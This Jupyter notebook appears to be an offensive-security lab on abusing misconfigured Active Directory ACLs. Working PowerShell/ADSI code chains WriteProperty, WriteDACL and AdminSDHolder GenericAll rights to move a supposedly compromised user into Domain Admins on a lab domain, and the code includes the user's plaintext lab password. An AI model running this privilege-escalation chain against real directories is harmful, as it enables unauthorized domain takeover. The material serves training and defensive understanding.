# ACL Overview
In the Windows operating system, everything is an object - that is, everything is represented by data structures in memory, that contain members that describe the nature of the data the structure is meant to represent. Obvious things such as files and registry keys are objects, but also more abstract things such as processes and threads are also objects.

Active Directory is no different - AD is primarily a database of components that represent the various identities and relationships in a Windows network. Each object or component in an AD environment is a user, a group, a computer, a printer, a service account, or even a container for any of these.

Again, as in the Windows operating system, Active Directory objects control who has access via Access Control Lists or ACLs (specifically the **D**iscretionary **A**ccess **C**ontrol List or _DACL_), with each Access Control Entry (or ACE) in the ACL specifying an identity (formally called a security principal) and what specific access rights that identity can excise on the object.

Access rights are incredibly powerful - the demonstration below is not exhaustive, but it will be become apparent how destructive a misconfiured ACE on the wrong object can be. Notably however, many of the attacks that are enabled by misconfigured access rights are detailed in their own notebooks, making understanding what objects have rights over other objects one of the fundamental tasks in reconaissance, and in understanding the attack paths through an AD environment.  

This lab however will focus on an attack path that relies entirely on misconfigured ACLs. While this is a contrived example, it will demonstrate how these attacks paths work, and lay important foundations for other labs. If you skip any lab, do not skip this one!

For this lab, we will assume we have access to the account of a user called "John Dee" by some initial access technique.

In [2]:
$domainController = "dc01.aclabuse.lab"
$userName = "john.dee"
$passWord = "johnsPass01"
$domainName = "aclabuse.lab"
$domain = New-Object DirectoryServices.DirectoryEntry("LDAP://$domainController","$domainName\$userName", $passWord)
$domain


distinguishedName : {DC=aclabuse,DC=lab}
Path              : LDAP://dc01.aclabuse.lab



Looks like the creds work. The above .NET type `DirectoryEntry` retrieves an entry in the AD directory as the name suggests. We are using the [ADSI interface](https://learn.microsoft.com/en-us/windows/win32/adsi/using-adsi) for these calls as the machine this notebook is running on will not be joined to the lab domain. The `DirectoryEntry` object which we are storing in the `$domain` variable is [being constructed](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.directoryentry.-ctor?view=net-8.0#system-directoryservices-directoryentry-ctor(system-string-system-string-system-string-system-directoryservices-authenticationtypes)) using the path to the _RootDSE_, which is the Root object of the entire Directory. The RootDSE sits on a directory server, so we supply it wih the FQDN of the domain controller (the DS for this lab).

Now, we will construct a `DirectorySearcher` object - think of it as a pointer or cursor which we use to traverse the directory and look for objects. Lets examine the account we have creds for in more detail, by setting the _filter_ on the searcher. This uses LDAP filter syntax, which is somewhat idiosyncratic. As you can see, looks like John is in the group __Office Admins__. Maybe an HR function of some kind? 

In [5]:
$searcher = New-Object System.DirectoryServices.DirectorySearcher($domain)
$searcher.Filter = "(&(objectClass=user)(samAccountName=$userName))"
$userObj = $searcher.FindOne()
"DN: $($userObj.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userObj.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=DevOps Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=IT Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


We will use the original domain object we retrieved and look at the immediate children of this node of the directory, namely, the organisational units. We need the LDAP path specifically.

In [3]:
$domain.Children | Where-Object { $_.schemaclassname -eq "organizationalunit" }


distinguishedName : {OU=Domain Controllers,DC=aclabuse,DC=lab}
Path              : LDAP://dc01.aclabuse.lab/OU=Domain Controllers,DC=aclabuse,DC=lab

distinguishedName : {OU=EnterpriseUsers,DC=aclabuse,DC=lab}
Path              : LDAP://dc01.aclabuse.lab/OU=EnterpriseUsers,DC=aclabuse,DC=lab



Using this we can reset the search root of our searcher object, and make our LDAP searches more efficient(as we are not having to traverse the entire directory now - we are starting from the _EnterpriseUsers_ OU.

In [6]:
$searcher.SearchRoot = New-Object DirectoryServices.DirectoryEntry("LDAP://$domainController/OU=EnterpriseUsers,DC=aclabuse,DC=lab","$domainName\$userName", $passWord)
$searcher.SearchRoot


distinguishedName : {OU=EnterpriseUsers,DC=aclabuse,DC=lab}
Path              : LDAP://dc01.aclabuse.lab/OU=EnterpriseUsers,DC=aclabuse,DC=lab



Lets examine the properties of the Office Admins group briefly.

In [8]:
$searcher.Filter = "(&(objectCategory=group)(objectClass=group)(cn=Office Admins))"
$officeAdminsObj = $searcher.FindOne()
$officeAdminsObj | Select-Object -ExpandProperty Properties


Name                           Value
----                           -----
usncreated                     {12648}
grouptype                      {-2147483646}
whenchanged                    {11/17/2024 11:02:34 AM}
cn                             {Office Admins}
whencreated                    {11/17/2024 11:02:34 AM}
member                         {CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab}
samaccountname                 {Office Admins}
instancetype                   {4}
dscorepropagationdata          {1/1/1601 12:00:00 AM}
objectguid                     {167 50 131 30 240 102 255 76 191 131 93 240 47 78 47 36}
name                           {Office Admins}
samaccounttype                 {268435456}
adspath                        {LDAP://dc01.aclabuse.lab/CN=Office Admins,OU=EnterpriseUsers,DC=ac…
objectcategory                 {CN=Group,CN=Schema,CN=Configuration,DC=aclabuse,DC=lab}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 129 193 150 86 35 88 9 158 130 119 145 

We can see the members only include John (this is a contrived lab after all). Notice that the SID of the group is in a binary format however. We need the SID for the next step, so we will construct a `SecurityIdentifier` object out of this binary SID, in order to convert it to the more recognisable.

In [9]:
$officeAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$officeAdminsObj.Properties.objectsid[0],0))
$officeAdminsSID


BinaryLength AccountDomainSid                         Value
------------ ----------------                         -----
          28 S-1-5-21-1452720513-2651412515-512849794 S-1-5-21-1452720513-2651412515-512849794-1105



Now for some actual recon. Lets look at what other groups the Office Admins group has rights on. As before we set the LDAP filter, this time to look for any groups with _admin_ in the name. Then, we iterate through the groups, examining the ACLs for the group as we go and highlighting any ACEs that contain the SID of the Office Admins group. 

In [23]:
function scout-adminACL {
    param (
    [Parameter(Mandatory=$true)]
    [string]$targetSID
    )

    Write-Host "Checking what access $targetSID has..."

    $scoutSearcher = New-Object System.DirectoryServices.DirectorySearcher($domain)
    # Filter for admin groups
    $scoutSearcher.Filter = "(&(objectCategory=group)(objectClass=group))"

    # Retrieve all the directory entries that match the above filter
    $groups = $scoutSearcher.FindAll()

    foreach ($group in $groups) {
        
        # Get the common name of the group
        $groupName = $group.Properties["cn"][0]
        
        # Get the DACL of the group
        $groupEntry = $group.GetDirectoryEntry()
        $groupACL = $groupEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        
        # Go through the ACL entries and check if the IdentityReference matches the SID of the Office Admins group
        foreach ($ace in $groupACL) {
            if ($ace.IdentityReference.CompareTo($targetSID) -eq 0) {
                Write-Host "$groupName : $($ace.AccessControlType) -> $($ace.ActiveDirectoryRights)"
            }
        }
    }
}

scout-adminACL($officeAdminsSID)

Checking what access S-1-5-21-1452720513-2651412515-512849794-1105 has...
DevOps Admins : Allow -> WriteProperty


Bingo. But what can we do with this right?

## WriteProperty
This right, as the name implies, grants a principal the capability to modify properties on another object. If we had `WriteProperty` on the _Domain Admins_ group, we could simply modify the _members_ property and add ourselves to that group, for example. Not so lucky this time, but we do have this right over the _DevOps Admins_ group. We will use this to add our compromised user to the _DevOps Admins_ group.

Although this notebook is not a tutorial on the ADSI interface to AD, some comments on how it works will be helpful. The

In [ ]:
$searcher.Filter = "(&(objectCategory=group)(objectClass=group)(cn=DevOps Admins))"
$devopsAdminsEntry = $searcher.FindOne().GetDirectoryEntry()
"Original Members:"
foreach ($member in $($devopsAdminsEntry.Properties['member'])) {
    "    $member"
}
$devopsAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
$devopsAdminsEntry.RefreshCache()
foreach ($member in $($devopsAdminsEntry.Properties['member'])) {
    "    $member"
}

Original Members: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
MethodInvocationException: 
Line |
   5 |  $devopsAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
     |  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"
Current Members: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab


Error: Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"

In [12]:
"DN: $($userObj.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userObj.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=DevOps Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=IT Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


## WriteDACL

In [24]:
$searcher.Filter = "(&(objectCategory=group)(objectClass=group)(cn=DevOps Admins))"
$devopsAdminsObj = $searcher.FindOne()
$devopsAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$devopsAdminsObj.Properties.objectsid[0],0))
scout-adminACL($devopsAdminsSID)

Checking what access S-1-5-21-1452720513-2651412515-512849794-1107 has...
IT Admins : Allow -> WriteDacl


Lets use the WriteDACL write to add an entry to the ACL on the IT Admins group object which lets us modify the group. We could use WriteProperty, but lets try a more permissive right: GenericWrite

In [ ]:
$userSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$userObj.Properties.objectsid[0],0))
$searcher.Filter = "(&(objectCategory=group)(objectClass=group)(cn=IT Admins))"
$ITAdminsObj = $searcher.FindOne()
$ITAdminsEntry = $ITAdminsObj.GetDirectoryEntry()
$ITAdminsEntry.PsBase.Options.SecurityMasks = 'Dacl'
$ITAdminsEntry.PsBase.ObjectSecurity.AddAccessRule(
    (New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        ([System.Security.Principal.IdentityReference]([System.Security.Principal.SecurityIdentifier]$userSID)), 
        ([System.DirectoryServices.ActiveDirectoryRights]'GenericWrite'),
        ([System.Security.AccessControl.AccessControlType]'Allow'),
        ([System.DirectoryServices.ActiveDirectorySecurityInheritance]'None'))
    )
)
$ITAdminsEntry.PsBase.CommitChanges()

Examining the ACL of the IT Admins object, we find an ACE for GenericWrite with John Dees SID.

In [16]:
ForEach ($ACE in $ITAdminsEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
    if ($ACE.IdentityReference.CompareTo($userSID) -eq 0) {
        $ACE
    }
}


ActiveDirectoryRights : GenericWrite
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : S-1-5-21-1452720513-2651412515-512849794-1104
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None



## GenericWrite

In [ ]:
"Original Members:"
foreach ($member in $($ITAdminsEntry.Properties['member'])) {
    "    $member"
}
$ITAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
$ITAdminsEntry.RefreshCache()
"Current Members:"
foreach ($member in $($ITAdminsEntry.Properties['member'])) {
    "    $member"
}

Original Members: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
MethodInvocationException: 
Line |
   2 |  $ITAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
     |  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"
Current Members: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab


Error: Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"

In [17]:
"DN: $($userObj.Properties.distinguishedname)"
"Groups:"
foreach ($group in $($userObj.Properties.memberof)) {
    "    $group"
}

DN: CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
Groups:
    CN=DevOps Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=IT Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=Office Admins,OU=EnterpriseUsers,DC=aclabuse,DC=lab


In [25]:
$ITAdminsSID = (New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$ITAdminsObj.Properties.objectsid[0],0))
scout-adminACL($ITAdminsSID)

Checking what access S-1-5-21-1452720513-2651412515-512849794-1106 has...
Administrators : Allow -> GenericAll
Print Operators : Allow -> GenericAll
Backup Operators : Allow -> GenericAll
Replicator : Allow -> GenericAll
Domain Controllers : Allow -> GenericAll
Schema Admins : Allow -> GenericAll
Enterprise Admins : Allow -> GenericAll
Domain Admins : Allow -> GenericAll
Server Operators : Allow -> GenericAll
Account Operators : Allow -> GenericAll
Read-only Domain Controllers : Allow -> GenericAll
Key Admins : Allow -> GenericAll
Enterprise Key Admins : Allow -> GenericAll


So what is granting us rights on all these privileged groups?

## GenericAll

In [26]:
$searcher.SearchRoot = New-Object DirectoryServices.DirectoryEntry("LDAP://$domainController","$domainName\$userName", $passWord)
$searcher.Filter = "(&(cn=AdminSDHolder))"
$adminSDEntry = $searcher.FindOne().GetDirectoryEntry()
ForEach ($ACE in $adminSDEntry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
    if ($ACE.IdentityReference.CompareTo($ITAdminsSID) -eq 0) {
        $ACE
    }
}


ActiveDirectoryRights : GenericAll
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : S-1-5-21-1452720513-2651412515-512849794-1106
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None



In [31]:
$searcher.Filter = "(&(objectCategory=group)(objectClass=group)(cn=Domain Admins))"
$domainAdminsObj = $searcher.FindOne()
$domainAdminsEntry = $domainAdminsObj.GetDirectoryEntry()
"Original Members:" 
foreach ($member in $($domainAdminsEntry.Properties['member'])) {
    "    $member"
}
$domainAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
$domainAdminsEntry.RefreshCache()
"Current Members:"
foreach ($member in $($domainAdminsEntry.Properties['member'])) {
    "    $member"
}


Original Members:
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=aclAdmin,CN=Users,DC=aclabuse,DC=lab
    CN=Administrator,CN=Users,DC=aclabuse,DC=lab
MethodInvocationException: 
Line |
   8 |  $domainAdminsEntry.Add($userObj.GetDirectoryEntry().Path)
     |  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"
Current Members:
    CN=John Dee,OU=EnterpriseUsers,DC=aclabuse,DC=lab
    CN=aclAdmin,CN=Users,DC=aclabuse,DC=lab
    CN=Administrator,CN=Users,DC=aclabuse,DC=lab


Error: Exception calling "Add" with "1" argument(s): "The object already exists. (0x80071392)"

## Last Words
Although a lot of manual recon was performed in this notebook, the entire attack path is viewable, in a much more digestible format, via bloodhound:

![aclabuse_attack_path](./Images/aclabuse.png) 

Interestingly, in its earlier versions bloodhound internally used the ADSI pattern used in this notebook; [it has since switched to a different method](https://blog.cptjesus.com/posts/sharphoundtechnical/#pure-ldap). 

# Further Reading
[An Ace Up the Sleeve: Designing Active Directory DACL Backdoors](https://specterops.io/wp-content/uploads/sites/3/2022/06/an_ace_up_the_sleeve.pdf)